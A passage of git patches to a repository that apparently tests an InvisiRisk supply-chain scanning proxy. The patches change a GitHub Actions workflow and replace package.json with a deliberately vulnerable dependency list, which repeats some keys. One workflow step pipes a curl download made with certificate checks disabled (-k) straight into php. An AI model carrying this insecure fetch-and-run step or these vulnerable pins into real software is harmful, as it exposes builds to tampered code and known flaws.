fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region }}" >> "$GITHUB_OUTPUT" - echo "registry_id=${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id }}" >> "$GITHUB_OUTPUT" - + echo "username=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username}}" >> "$GITHUB_OUTPUT" + echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" + echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" + echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" + start_proxy_and_build: runs-on: ubuntu-latest needs: [create_scan_in_IR_Portal, ecr_details] @@ -58,36 +57,34 @@ jobs: pse: image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test credentials: - username: ${{ needs.ecr_details.outputs.ecr_username }} - password: ${{ needs.ecr_details.outputs.ecr_token }} + username: ${{needs.ecr_details.outputs.ecr_username}} + password: ${{needs.ecr_details.outputs.ecr_token}} env: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{ secrets.VB_API_KEY }} - INVISIRISK_PORTAL: https://app.stage.veribom.com + INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} + INVISIRISK_PORTAL: https://app.stage.veribom.com GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: - image: php:8.2 + image: node:18-alpine options: --cap-add=NET_ADMIN strategy: matrix: - php-version: [8.2] + node-version: [18.x] steps: - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID - - uses: invisirisk/pse-action@v1.0.8 - with: + - env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + - uses: invisirisk/pse-action@v1.0.8 + with: github-token: ${{ secrets.GITHUB_TOKEN }} SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - - - name: Checkout the code - uses: actions/checkout@v3 - - - name: Install Composer - run: | - curl -sS https://getcomposer.org/installer | php - sudo mv composer.phar /usr/local/bin/composer - - - name: Install PHP Dependencies - run: composer install + - name: Checkout the code + uses: actions/checkout@v3 + - name: Use Node.js ${{ matrix.node-version }} + uses: actions/setup-node@v3 + with: + node-version: ${{ matrix.node-version }} + + - run: npm install -g pnpm + - run: pnpm install From da7e515cba50dbcdd7d8eabd2f56fdb3f129792c Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 14:19:38 +0545 Subject: [PATCH 43/89] Update mainphp.yml --- .github/workflows/mainphp.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/.github/workflows/mainphp.yml b/.github/workflows/mainphp.yml index 31e135a..533ba1b 100644 --- a/.github/workflows/mainphp.yml +++ b/.github/workflows/mainphp.yml @@ -86,8 +86,10 @@ jobs: - name: Install Composer run: | - curl -sS https://getcomposer.org/installer | php - sudo mv composer.phar /usr/local/bin/composer + apt-get update && apt-get install -y curl php-cli unzip + curl -k -sS https://getcomposer.org/installer | php + mv composer.phar /usr/local/bin/composer + - name: Install PHP Dependencies run: composer install From b94bc637d57de3dafd30ccc24bf5eeb38f0702f7 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 14:29:40 +0545 Subject: [PATCH 44/89] Update mainphp.yml --- .github/workflows/mainphp.yml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/.github/workflows/mainphp.yml b/.github/workflows/mainphp.yml index 533ba1b..1446b54 100644 --- a/.github/workflows/mainphp.yml +++ b/.github/workflows/mainphp.yml @@ -86,9 +86,12 @@ jobs: - name: Install Composer run: | - apt-get update && apt-get install -y curl php-cli unzip - curl -k -sS https://getcomposer.org/installer | php - mv composer.phar /usr/local/bin/composer + apt-get update + apt-get install -y curl unzip + apt-get install -y php8.2-cli || apt-get install -y php-cli + curl -k -sS https://getcomposer.org/installer | php + mv composer.phar /usr/local/bin/composer + - name: Install PHP Dependencies From 0c66de30cd58a60ee8f71e9bcece900dbd0c4041 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Wed, 5 Mar 2025 10:27:37 +0545 Subject: [PATCH 45/89] Update composer.json --- composer.json | 112 +------------------------------------------------- 1 file changed, 1 insertion(+), 111 deletions(-) diff --git a/composer.json b/composer.json index 7868e26..8b13789 100644 --- a/composer.json +++ b/composer.json @@ -1,111 +1 @@ -{ - "require": { - "monolog/monolog": "^2.0", - "guzzlehttp/guzzle": "^7.0", - "symfony/symfony": "^6.0", - "laravel/framework": "^10.0", - "phpunit/phpunit": "^9.0", - "doctrine/orm": "^2.0", - "fzaninotto/faker": "^1.9", - "vlucas/phpdotenv": "^5.0", - "swiftmailer/swiftmailer": "^6.0", - "twig/twig": "^3.0", - "psr/log": "^1.0", - "sebastian/version": "^3.0", - "sebastian/global-state": "^5.0", - "sebastian/exporter": "^4.0", - "sebastian/environment": "^5.0", - "sebastian/diff": "^4.0", - "sebastian/comparator": "^4.0", - "phpdocumentor/reflection-common": "^2.0", - "phpdocumentor/type-resolver": "^1.0", - "phpdocumentor/reflection-docblock": "^5.0", - "webmozart/assert": "^1.0", - "phpoption/phpoption": "^1.0", - "nikic/php-parser": "^4.0", - "mockery/mockery": "^1.0", - "hamcrest/hamcrest-php": "^2.0", - "dnoegel/php-xdg-base-dir": "^0.1", - "composer/semver": "^3.0", - "composer/installers": "^2.0", - "composer/ca-bundle": "^2.0", - "composer/composer": "^2.0", - "classpreloader/classpreloader": "^4.0", - "brianium/paratest": "^6.0", - "brick/math": "^0.9", - "aws/aws-sdk-php": "^3.0", - "asm89/stack-cors": "^2.0", - "ramsey/uuid": "^4.0", - "ralouphie/getallheaders": "^3.0", - "psy/psysh": "^0.10", - "phpseclib/phpseclib": "^3.0", - "phpspec/prophecy": "^1.0", - "phar-io/version": "^3.0", - "phar-io/manifest": "^2.0", - "paragonie/random_compat": "^9.0", - "myclabs/deep-copy": "^1.0", - "league/mime-type-detection": "^1.0", - "league/flysystem": "^3.0", - "league/commonmark": "^2.0", - "lcobucci/jwt": "^4.0", - "laravel/tinker": "^2.0", - "symfony/http-foundation": "^6.0", - "symfony/console": "^6.0", - "symfony/routing": "^6.0", - "symfony/event-dispatcher": "^6.0", - "symfony/http-kernel": "^6.0", - "symfony/finder": "^6.0", - "symfony/filesystem": "^6.0", - "symfony/process": "^6.0", - "symfony/var-dumper": "^6.0", - "symfony/translation": "^6.0", - "symfony/validator": "^6.0", - "symfony/serializer": "^6.0", - "symfony/yaml": "^6.0", - "symfony/security-core": "^6.0", - "symfony/security-http": "^6.0", - "symfony/security-csrf": "^6.0", - "symfony/security-guard": "^6.0", - "symfony/security-bundle": "^6.0", - "symfony/monolog-bridge": "^6.0", - "symfony/twig-bridge": "^6.0", - "symfony/twig-bundle": "^6.0", - "symfony/asset": "^6.0", - "symfony/expression-language": "^6.0", - "symfony/cache": "^6.0", - "symfony/lock": "^6.0", - "symfony/messenger": "^6.0", - "symfony/mailer": "^6.0", - "symfony/mercure": "^6.0", - "symfony/web-link": "^6.0", - "symfony/dom-crawler": "^6.0", - "symfony/browser-kit": "^6.0", - "symfony/css-selector": "^6.0", - "symfony/phpunit-bridge": "^6.0", - "symfony/panther": "^2.0", - "symfony/string": "^6.0", - "symfony/uid": "^6.0", - "symfony/rate-limiter": "^6.0", - "symfony/scheduler": "^6.0", - "symfony/remote-event": "^6.0", - "symfony/webhook": "^6.0", - "symfony/notifier": "^6.0", - "symfony/password-hasher": "^6.0", - "symfony/clock": "^6.0", - "symfony/doctrine-bridge": "^6.0", - "symfony/doctrine-messenger": "^6.0", - "symfony/orm-pack": "^2.0", - "symfony/webpack-encore-bundle": "^1.0", - "symfony/ux": "^2.0", - "symfony/ux-turbo": "^2.0", - "symfony/ux-twig-component": "^2.0", - "symfony/ux-live-component": "^2.0", - "symfony/ux-dropzone": "^2.0", - "symfony/ux-chartjs": "^2.0", - "symfony/ux-cropperjs": "^2.0", - "symfony/ux-lazy-image": "^2.0", - "symfony/ux-notify": "^2.0", - "symfony/ux-toggle-password": "^2.0", - "symfony/ux-autocomplete": "^2.0" - } -} + From 62cddf38fd62fd62882ec387bd9cfab765e8c7b2 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 28 Mar 2025 11:11:22 +0545 Subject: [PATCH 46/89] Update package.json --- package.json | 556 +++++---------------------------------------------- 1 file changed, 53 insertions(+), 503 deletions(-) diff --git a/package.json b/package.json index 51b8d3b..c468407 100644 --- a/package.json +++ b/package.json @@ -1,512 +1,62 @@ { - "name": "top500-npm", + "name": "vulnerable-project", "version": "1.0.0", + "description": "A project with intentionally vulnerable dependencies.", "main": "index.js", "scripts": { + "start": "node index.js", "test": "echo \"Error: no test specified\" && exit 1" }, - "author": "", - "license": "ISC", - "description": "", "dependencies": { - "@angular/animations": "^19.2.0", - "@angular/cdk": "^19.2.1", - "@angular/common": "^19.2.0", - "@angular/compiler": "^19.2.0", - "@angular/core": "^19.2.0", - "@angular/forms": "^19.2.0", - "@angular/material": "^19.2.1", - "@angular/platform-browser": "^19.2.0", - "@angular/platform-browser-dynamic": "^19.2.0", - "@angular/router": "^19.2.0", - "@apollo/client": "^3.13.1", - "@aws-sdk/client-s3": "^3.758.0", - "@babel/code-frame": "^7.26.2", - "@babel/core": "^7.26.9", - "@babel/generator": "^7.26.9", - "@babel/helper-function-name": "^7.24.7", - "@babel/helper-module-imports": "^7.25.9", - "@babel/helper-module-transforms": "^7.26.0", - "@babel/helper-plugin-utils": "^7.26.5", - "@babel/helper-simple-access": "^7.25.9", - "@babel/helper-split-export-declaration": "^7.24.7", - "@babel/helpers": "^7.26.9", - "@babel/highlight": "^7.25.9", - "@babel/parser": "^7.26.9", - "@babel/preset-env": "^7.26.9", - "@babel/preset-typescript": "^7.26.0", - "@babel/runtime": "^7.26.9", - "@babel/template": "^7.26.9", - "@babel/types": "^7.26.9", - "@cubejs-client/core": "^1.0.10", - "@cubejs-client/react": "^1.0.10", - "@emotion/react": "^11.14.0", - "@emotion/styled": "^11.14.0", - "@heroku-cli/color": "^2.0.4", - "@heroku-cli/command": "^11.5.0", - "@heroku-cli/plugin-ps": "^8.1.7", - "@heroku-cli/plugin-ps-exec": "^2.6.2", - "@heroku-cli/plugin-run": "^8.1.4", - "@jridgewell/gen-mapping": "^0.3.8", - "@jridgewell/trace-mapping": "^0.3.25", - "@jupyterlab/application": "^4.3.5", - "@jupyterlab/application-extension": "^4.3.5", - "@jupyterlab/apputils-extension": "^4.3.5", - "@jupyterlab/cell-toolbar-extension": "^4.3.5", - "@jupyterlab/celltags-extension": "^4.3.5", - "@jupyterlab/codemirror-extension": "^4.3.5", - "@jupyterlab/completer-extension": "^4.3.5", - "@jupyterlab/console-extension": "^4.3.5", - "@jupyterlab/coreutils": "^6.3.5", - "@jupyterlab/csvviewer-extension": "^4.3.5", - "@jupyterlab/debugger-extension": "^4.3.5", - "@jupyterlab/docmanager-extension": "^4.3.5", - "@jupyterlab/docprovider-extension": "^3.6.8", - "@jupyterlab/documentsearch-extension": "^4.3.5", - "@jupyterlab/extensionmanager-extension": "^4.3.5", - "@jupyterlab/filebrowser-extension": "^4.3.5", - "@jupyterlab/fileeditor-extension": "^4.3.5", - "@jupyterlab/help-extension": "^4.3.5", - "@jupyterlab/htmlviewer-extension": "^4.3.5", - "@jupyterlab/hub-extension": "^4.3.5", - "@jupyterlab/imageviewer-extension": "^4.3.5", - "@jupyterlab/inspector-extension": "^4.3.5", - "@jupyterlab/javascript-extension": "^4.3.5", - "@jupyterlab/json-extension": "^4.3.5", - "@jupyterlab/launcher-extension": "^4.3.5", - "@jupyterlab/logconsole-extension": "^4.3.5", - "@jupyterlab/mainmenu-extension": "^4.3.5", - "@jupyterlab/markdownviewer-extension": "^4.3.5", - "@jupyterlab/mathjax2-extension": "^4.0.0", - "@jupyterlab/notebook-extension": "^4.3.5", - "@jupyterlab/pdf-extension": "^4.3.5", - "@jupyterlab/rendermime-extension": "^4.3.5", - "@jupyterlab/running-extension": "^4.3.5", - "@jupyterlab/settingeditor-extension": "^4.3.5", - "@jupyterlab/shortcuts-extension": "^5.1.5", - "@jupyterlab/statusbar-extension": "^4.3.5", - "@jupyterlab/terminal-extension": "^4.3.5", - "@jupyterlab/theme-dark-extension": "^4.3.5", - "@jupyterlab/theme-light-extension": "^4.3.5", - "@jupyterlab/toc-extension": "^6.3.5", - "@jupyterlab/tooltip-extension": "^4.3.5", - "@jupyterlab/translation-extension": "^4.3.5", - "@jupyterlab/ui-components-extension": "^4.3.5", - "@jupyterlab/vdom-extension": "^3.6.8", - "@jupyterlab/vega5-extension": "^4.3.5", - "@material-ui/core": "^4.12.4", - "@material-ui/icons": "^4.11.3", - "@mui/icons-material": "^6.4.6", - "@mui/material": "^6.4.6", - "@nestjs/common": "^11.0.11", - "@nestjs/core": "^11.0.11", - "@nestjs/platform-express": "^11.0.11", - "@oclif/command": "^1.8.36", - "@oclif/config": "^1.18.17", - "@oclif/plugin-commands": "^4.1.21", - "@oclif/plugin-help": "^6.2.26", - "@oclif/plugin-legacy": "^2.0.22", - "@oclif/plugin-not-found": "^3.2.44", - "@oclif/plugin-plugins": "^5.4.34", - "@oclif/plugin-update": "^4.6.33", - "@oclif/plugin-warn-if-update-available": "^3.1.35", - "@oclif/plugin-which": "^3.2.32", - "@reduxjs/toolkit": "^2.6.0", - "@salesforce-ux/design-system": "^2.26.2", - "@salesforce-ux/icons": "^10.12.1", - "@salesforce/design-system-react": "^0.10.63", - "@sentry/integrations": "^7.114.0", - "@sentry/node": "^9.3.0", - "@sentry/react": "^9.3.0", - "@sentry/tracing": "^7.120.3", - "@susy-js/lodash.merge": "^4.6.6", - "@swc/core": "^1.11.5", - "@testing-library/jest-dom": "^6.6.3", - "@testing-library/react": "^16.2.0", - "@testing-library/user-event": "^14.6.1", - "@types/express": "^5.0.0", - "@types/jest": "^29.5.14", - "@types/lodash": "^4.17.16", - "@types/node": "^22.13.8", - "@types/react": "^19.0.10", - "@types/react-dom": "^19.0.4", - "@types/uuid": "^10.0.0", - "@types/yargs": "^17.0.33", - "@typescript-eslint/eslint-plugin": "^8.25.0", - "@typescript-eslint/parser": "^8.25.0", - "accepts": "^1.3.8", - "acorn": "^8.14.0", - "agent-base": "^7.1.3", - "ajv": "^8.17.1", - "ansi-escapes": "^7.0.0", - "ansi-regex": "^6.1.0", - "ansi-styles": "^6.2.1", - "anymatch": "^3.1.3", - "argparse": "^2.0.1", - "array-flatten": "^3.0.0", - "array-union": "^3.0.1", - "async": "^3.2.6", - "autoprefixer": "^10.4.20", - "aws-cdk-lib": "^2.181.1", - "aws-sdk": "^2.1692.0", - "axios": "^1.8.1", - "babel-loader": "^10.0.0", - "babel-polyfill": "^6.26.0", - "balanced-match": "^3.0.1", - "bcrypt-nodejs": "^0.0.3", - "binary-extensions": "^3.0.0", - "bluebird": "^3.7.2", - "body-parser": "^1.20.3", - "bootstrap": "^5.3.3", - "brace-expansion": "^4.0.0", - "braces": "^3.0.3", - "browserslist": "^4.24.4", - "buffer": "^6.0.3", - "buffer-from": "^1.1.2", - "bytes": "^3.1.2", - "call-bind": "^1.0.8", - "callsites": "^4.2.0", - "camelcase": "^8.0.0", - "chai": "^5.2.0", - "chai-as-promised": "^8.0.1", - "chalk": "^5.4.1", - "chart.js": "^4.4.8", - "child-process-promise": "^2.2.1", - "chownr": "^3.0.0", - "ci-info": "^4.1.0", - "classnames": "^2.5.1", - "cli-progress-bar": "^1.0.1", - "cliui": "^8.0.1", - "color-convert": "^3.0.1", - "color-name": "^2.0.0", - "combined-stream": "^1.0.8", - "commander": "^13.1.0", - "compression": "^1.8.0", - "concat-map": "^0.0.2", - "config": "^3.3.12", - "constructs": "^10.4.2", - "content-type": "^1.0.5", - "convert-source-map": "^2.0.0", - "cookie": "^1.0.2", - "cookie-parser": "^1.4.7", - "core-js": "^3.41.0", - "core-util-is": "^1.0.3", - "cors": "^2.8.5", - "cross-env": "^7.0.3", - "cross-spawn": "^7.0.6", - "crypto-js": "^4.2.0", - "css-loader": "^7.1.2", - "csurf": "^1.11.0", - "cypress": "^14.1.0", - "d3": "^7.9.0", - "d3-flame-graph": "^4.1.3", - "d3-selection": "^3.0.0", - "dagre-d3": "^0.6.4", - "date-fns": "^4.1.0", - "dayjs": "^1.11.13", - "dd-trace": "^5.40.0", - "debug": "^4.4.0", - "deep-is": "^0.1.4", - "define-properties": "^1.2.1", - "define-property": "^2.0.2", - "delayed-stream": "^1.0.0", - "depd": "^2.0.0", - "dependable": "^1.1.0", - "destroy": "^1.2.0", - "doctrine": "^3.0.0", - "domelementtype": "^2.3.0", - "dompurify": "^3.2.4", - "dont-sniff-mimetype": "^1.1.0", - "dotenv": "^16.4.7", - "ejs": "^3.1.10", - "electron-to-chromium": "^1.5.109", - "emoji-regex": "^10.4.0", - "end-of-stream": "^1.4.4", - "enhanced-resolve": "^5.18.1", - "entities": "^6.0.0", - "error-ex": "^1.3.2", - "es-abstract": "^1.23.9", - "escape-string-regexp": "^5.0.0", - "eslint": "^9.21.0", - "eslint-config-prettier": "^10.0.2", - "eslint-plugin-import": "^2.31.0", - "eslint-plugin-jsx-a11y": "^6.10.2", - "eslint-plugin-prettier": "^5.2.3", - "eslint-plugin-react": "^7.37.4", - "eslint-plugin-react-hooks": "^5.2.0", - "eslint-scope": "^8.2.0", - "eslint-visitor-keys": "^4.2.0", - "esprima": "^4.0.1", - "esrecurse": "^4.3.0", - "estraverse": "^5.3.0", - "execa": "^9.5.2", - "express": "^4.21.2", - "express-session": "^1.18.1", - "extend-shallow": "^3.0.2", - "file-exists": "^5.0.1", - "file-saver": "^2.0.5", - "fill-range": "^7.1.1", - "finalhandler": "^1.3.1", - "find-cache-dir": "^5.0.0", - "find-up": "^7.0.0", - "font-awesome": "^4.7.0", - "forever": "^4.0.3", - "form-data": "^4.0.2", - "formik": "^2.4.6", - "fs-extra": "^11.3.0", - "fs-extra-promise": "^1.0.1", - "fs.realpath": "^1.0.0", - "function-bind": "^1.1.2", - "get-caller-file": "^2.0.5", - "get-intrinsic": "^1.3.0", - "get-stream": "^9.0.1", - "glob": "^11.0.1", - "glob-parent": "^6.0.2", - "globals": "^16.0.0", - "graceful-fs": "^4.2.11", - "graphql": "^16.10.0", - "graphql-tag": "^2.12.6", - "has": "^1.0.4", - "has-flag": "^5.0.1", - "has-symbols": "^1.1.0", - "has-value": "^2.0.2", - "has-values": "^2.0.1", - "helmet": "^8.0.0", - "history": "^5.3.0", - "html-to-text": "^9.0.5", - "http-call": "^5.3.0", - "http-errors": "^2.0.0", - "http-status-codes": "^2.3.0", - "husky": "^9.1.7", - "i18next": "^24.2.2", - "iconv-lite": "^0.6.3", - "ieee754": "^1.2.1", - "ignore": "^7.0.3", - "immer": "^10.1.1", - "import-fresh": "^3.3.1", - "imurmurhash": "^0.1.4", - "indent-string": "^5.0.0", - "inflight": "^1.0.6", - "inherits": "^2.0.4", - "ioredis": "^5.5.0", - "ipaddr.js": "^2.2.0", - "is-accessor-descriptor": "^3.0.5", - "is-arrayish": "^0.3.2", - "is-callable": "^1.2.7", - "is-core-module": "^2.16.1", - "is-data-descriptor": "^2.1.3", - "is-date-object": "^1.1.0", - "is-descriptor": "^3.1.1", - "is-extendable": "^1.0.1", - "is-extglob": "^2.1.1", - "is-fullwidth-code-point": "^5.0.0", - "is-glob": "^4.0.3", - "is-number": "^7.0.0", - "is-plain-obj": "^4.1.0", - "is-regex": "^1.2.1", - "is-stream": "^4.0.1", - "is-symbol": "^1.1.1", - "is-wsl": "^3.1.0", - "isarray": "^2.0.5", - "isexe": "^3.1.1", - "isobject": "^4.0.0", - "jest": "^29.7.0", - "jest-worker": "^29.7.0", - "joi": "^17.13.3", - "jquery": "^3.7.1", - "jqueryui": "^1.11.1", - "js-cookie": "^3.0.5", - "js-tokens": "^9.0.1", - "js-yaml": "^4.1.0", - "jsesc": "^3.1.0", - "json-schema-traverse": "^1.0.0", - "json-stable-stringify": "^1.2.1", - "json5": "^2.2.3", - "jsonschema": "^1.5.0", - "jsonwebtoken": "^9.0.2", - "junit": "^1.4.9", - "jwt-decode": "^4.0.0", - "kind-of": "^6.0.3", - "knex": "^3.1.0", - "lint-staged": "^15.4.3", - "loader-utils": "^3.3.1", - "locate-path": "^7.2.0", - "lodash": "^4.17.21", - "lru-cache": "^11.0.2", - "luxon": "^3.5.0", - "lwc": "^8.14.0", - "make-dir": "^5.0.0", - "marked": "^15.0.7", - "mathjs": "^14.3.0", - "memoizee": "^0.4.17", - "micromatch": "^4.0.8", - "mime": "^4.0.6", - "mime-db": "^1.53.0", - "mime-types": "^2.1.35", - "mimic-fn": "^5.0.0", - "mini-css-extract-plugin": "^2.9.2", - "minimatch": "^10.0.1", - "minimist": "^1.2.8", - "mkdirp": "^3.0.1", - "mocha": "^11.1.0", - "moment": "^2.30.1", - "moment-timezone": "^0.5.47", - "mongodb": "^6.14.0", - "morgan": "^1.10.0", - "ms": "^2.1.3", - "mysql": "^2.18.1", - "needle": "^3.3.1", - "negotiator": "^1.0.0", - "netrc-parser": "^3.1.6", - "newrelic": "^12.14.0", - "next": "^15.2.0", - "node-esapi": "^0.0.1", - "node-fetch": "^3.3.2", - "node-releases": "^2.0.19", - "nodemon": "^3.1.9", - "nopt": "^8.1.0", - "normalize-path": "^3.0.0", - "npm-run-path": "^6.0.0", - "object-inspect": "^1.13.4", - "object-keys": "^1.1.1", - "object.assign": "^4.1.7", - "oboe": "^2.1.7", - "once": "^1.4.0", - "onetime": "^7.0.0", - "optionator": "^0.9.4", - "p-limit": "^6.2.0", - "p-locate": "^6.0.0", - "p-map": "^7.0.3", - "p-try": "^3.0.0", - "papaparse": "^5.5.2", - "parse-json": "^8.1.0", - "parse5": "^7.2.1", - "passport": "^0.7.0", - "path-exists": "^5.0.0", - "path-is-absolute": "^2.0.0", - "path-key": "^4.0.0", - "path-parse": "^1.0.7", - "path-type": "^6.0.0", - "pg": "^8.13.3", - "picocolors": "^1.1.1", - "picomatch": "^4.0.2", - "pify": "^6.1.0", - "pino": "^9.6.0", - "pkg-dir": "^8.0.0", - "please-upgrade-node": "^3.2.0", - "postcss": "^8.5.3", - "postcss-selector-parser": "^7.1.0", - "postmonger": "^0.0.16", - "prettier": "^3.5.3", - "pretty-format": "^29.7.0", - "process-nextick-args": "^2.0.1", - "prom-client": "^15.1.3", - "prop-types": "^15.8.1", - "proxy-addr": "^2.0.7", - "psl": "^1.15.0", - "pump": "^3.0.2", - "punycode": "^2.3.1", - "puppeteer": "^24.3.0", - "qs": "^6.14.0", - "query-string": "^9.1.1", - "raw-body": "^3.0.0", - "react": "^19.0.0", - "react-bootstrap": "^2.10.9", - "react-dom": "^19.0.0", - "react-helmet": "^6.1.0", - "react-hook-form": "^7.54.2", - "react-i18next": "^15.4.1", - "react-intl": "^7.1.6", - "react-query": "^3.39.3", - "react-redux": "^9.2.0", - "react-router": "^7.2.0", - "react-router-dom": "^7.2.0", - "react-scripts": "^5.0.1", - "react-select": "^5.10.0", - "reactable": "^1.1.0", - "readable-stream": "^4.7.0", - "readdirp": "^4.1.2", - "recharts": "^2.15.1", - "redis": "^4.7.0", - "redux": "^5.0.1", - "redux-thunk": "^3.1.0", - "reflect-metadata": "^0.2.2", - "regenerator-runtime": "^0.14.1", - "request": "^2.88.2", - "request-promise": "^4.2.6", - "resolve": "^1.22.10", - "resolve-from": "^5.0.0", - "rimraf": "^6.0.1", - "rxjs": "^7.8.2", - "safe-buffer": "^5.2.1", - "safer-buffer": "^2.1.2", - "sass": "^1.85.1", - "sax": "^1.4.1", - "schema-utils": "^4.3.0", - "semver": "^7.7.1", - "send": "^1.1.0", - "setprototypeof": "^1.2.0", - "sha1": "^1.1.1", - "shebang-command": "^2.0.0", - "shebang-regex": "^4.0.0", - "signal-exit": "^4.1.0", - "slash": "^5.1.0", - "slice-ansi": "^7.1.0", - "source-map": "^0.7.4", - "source-map-support": "^0.5.21", - "stats-lite": "^2.2.0", - "statuses": "^2.0.1", - "string-width": "^7.2.0", - "string_decoder": "^1.3.0", - "strip-ansi": "^7.1.0", - "strip-bom": "^5.0.0", - "strip-json-comments": "^5.0.1", - "style-loader": "^4.0.0", - "styled-components": "^6.1.15", - "superagent": "^10.1.1", - "supports-color": "^10.0.0", - "swagger-ui-express": "^5.0.1", - "swig": "^1.4.2", - "tapable": "^2.2.1", - "to-fast-properties": "^4.0.0", - "to-regex-range": "^5.0.1", - "toidentifier": "^1.0.1", - "tr46": "^5.0.0", - "tracium": "^0.2.1", - "ts-jest": "^29.2.6", - "ts-loader": "^9.5.2", - "ts-node": "^10.9.2", - "tslib": "^2.8.1", - "type-fest": "^4.36.0", - "typescript": "^5.8.2", - "underscore": "^1.13.7", - "universalify": "^2.0.1", - "uri-js": "^4.4.1", - "url-loader": "^4.1.1", - "util-deprecate": "^1.0.2", - "uuid": "^11.1.0", - "vue": "^3.5.13", - "web-vitals": "^4.2.4", - "webidl-conversions": "^7.0.0", - "webpack": "^5.98.0", - "webpack-cli": "^6.0.1", - "whatwg-fetch": "^3.6.20", - "whatwg-url": "^14.1.1", - "which": "^5.0.0", - "winston": "^3.17.0", - "wrap-ansi": "^9.0.0", - "wrappy": "^1.0.2", - "write-file-atomic": "^6.0.0", - "ws": "^8.18.1", - "ws-non-native": "^0.4.31", - "xml2js": "^0.6.2", - "xtend": "^4.0.2", - "y18n": "^5.0.8", - "yallist": "^5.0.0", - "yargs": "^17.7.2", - "yargs-parser": "^21.1.1", - "yup": "^1.6.1", - "zod": "^3.24.2", - "zone.js": "^0.15.0" + "express": "4.17.1", + "lodash": "4.17.20", + "mongoose": "5.9.2", + "body-parser": "1.19.0", + "cors": "2.8.5", + "dotenv": "8.2.0", + "jsonwebtoken": "8.5.1", + "helmet": "3.23.3", + "morgan": "1.10.0", + "bcryptjs": "2.4.3", + "moment": "2.24.0", + "request": "2.88.2", + "bluebird": "3.7.2", + "debug": "4.1.1", + "async": "3.2.0", + "winston": "3.2.1", + "multer": "1.4.2", + "nodemailer": "6.4.6", + "mysql": "2.18.1", + "pg": "8.2.1", + "redis": "3.0.2", + "socket.io": "2.3.0", + "uuid": "3.3.3", + "validator": "13.1.1", + "xml2js": "0.4.23", + "cheerio": "1.0.0-rc.3", + "crypto-js": "4.0.0", + "node-fetch": "2.6.1", + "sharp": "0.25.4", + "jsonwebtoken": "8.3.0", + "commander": "5.0.0", + "chalk": "4.0.0", + "ini": "1.3.5", + "handlebars": "4.7.6", + "marked": "0.7.0", + "merge-deep": "3.0.2", + "minimist": "1.2.5", + "q": "1.5.1", + "underscore": "1.10.2", + "yargs-parser": "20.2.2", + "jquery": "3.5.1", + "xmlhttprequest": "1.8.0", + "debug": "2.6.9", + "merge": "1.2.1", + "lodash.merge": "4.6.2", + "lodash.defaultsdeep": "4.6.1", + "marked": "0.3.6", + "react": "16.13.1", + "react-dom": "16.13.1", + "axios": "0.19.2" } } From f931fc62e8e9481000e0c88c66720b68988a890b Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 28 Mar 2025 11:11:36 +0545 Subject: [PATCH 47/89] Delete composer.json --- composer.json | 1 - 1 file changed, 1 deletion(-) delete mode 100644 composer.json diff --git a/composer.json b/composer.json deleted file mode 100644 index 8b13789..0000000 --- a/composer.json +++ /dev/null @@ -1 +0,0 @@ - From f5ab88c8db14185efff7c1f8476f94f16a2ce18b Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Fri, 28 Mar 2025 11:11:54 +0545 Subject: [PATCH 48/89] Delete mern-social-second-edition/package.json --- mern-social-second-edition/package.json | 63 ------------------------- 1 file changed, 63 deletions(-) delete mode 100644 mern-social-second-edition/package.json diff --git a/mern-social-second-edition/package.json b/mern-social-second-edition/package.json deleted file mode 100644 index 786815a..0000000 --- a/mern-social-second-edition/package.json +++ /dev/null @@ -1,63 +0,0 @@ -{ - "name": "mern-social", - "version": "2.0.0", - "description": "A MERN stack based social media application", - "author": "Shama Hoque", - "license": "MIT", - "keywords": [ - "react", - "express", - "mongodb", - "node", - "mern" - ], - "repository": { - "type": "git", - "url": "https://github.com/shamahoque/mern-social.git" - }, - "homepage": "https://github.com/shamahoque/mern-social", - "main": "./dist/server.generated.js", - "scripts": { - "development": "nodemon", - "build": "webpack --config webpack.config.client.production.js && webpack --mode=production --config webpack.config.server.js", - "start": "NODE_ENV=production node ./dist/server.generated.js" - }, - "engines": { - "node": "13.12.0", - "npm": "6.14.4" - }, - "devDependencies": { - "@babel/core": "7.9.0", - "@babel/preset-env": "7.9.0", - "@babel/preset-react": "7.9.4", - "babel-loader": "8.1.0", - "file-loader": "6.0.0", - "nodemon": "2.0.2", - "webpack": "4.42.1", - "webpack-cli": "3.3.11", - "webpack-dev-middleware": "3.7.2", - "webpack-hot-middleware": "2.25.0", - "webpack-node-externals": "1.7.2" - }, - "dependencies": { - "@hot-loader/react-dom": "16.13.0", - "@material-ui/core": "4.9.8", - "@material-ui/icons": "4.9.1", - "body-parser": "1.19.0", - "compression": "1.7.4", - "cookie-parser": "1.4.5", - "cors": "2.8.5", - "express": "4.17.1", - "express-jwt": "5.3.1", - "formidable": "1.2.2", - "helmet": "3.22.0", - "jsonwebtoken": "8.5.1", - "lodash": "4.17.15", - "mongoose": "5.9.7", - "react": "16.13.1", - "react-dom": "16.13.1", - "react-hot-loader": "4.12.20", - "react-router": "5.1.2", - "react-router-dom": "5.1.2" - } -} From 